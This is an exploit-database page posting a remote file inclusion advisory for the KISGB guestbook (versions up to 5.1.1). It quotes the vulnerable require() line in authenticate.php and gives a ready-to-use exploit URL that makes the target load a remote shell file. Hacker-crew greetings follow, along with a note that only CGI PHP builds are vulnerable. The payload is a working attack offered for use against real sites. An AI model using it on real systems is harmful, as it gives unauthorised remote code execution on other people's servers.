[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KISGB <= 5.1.1 (authenticate.php) Remote File Include Vulnerability

Author
mdx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1288
Category
web applications
Date add
22-12-2006
Platform
unsorted
===================================================================
KISGB <= 5.1.1 (authenticate.php) Remote File Include Vulnerability
===================================================================



******************************************************************************************************
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
+******************************************************************************************************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
*******************************************************************************************************************
+Author : mdx
*
*****************************************************************************
+Files :								    *
+authenticate.php?                                                          *
**********************************************************************************
+code  :                                                                         *
+                                                                                *
+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+                                                                                *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt?   +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?                  Hi , The_bat_hacker , How are you ? ;=)                                   *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..		     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************                                                                          *
**********************************************************************************************


//////////////////////////////////////////////////////////////////////////////////////////////


Notes:

$sapi_name = strtolower(php_sapi_name());
if (strpos($sapi_name,"cgi")===FALSE) {
}
else {
	Vulnerable here.
	
So this is only vulnerable for CGI PHP versions.


#  0day.today [2024-12-25]  #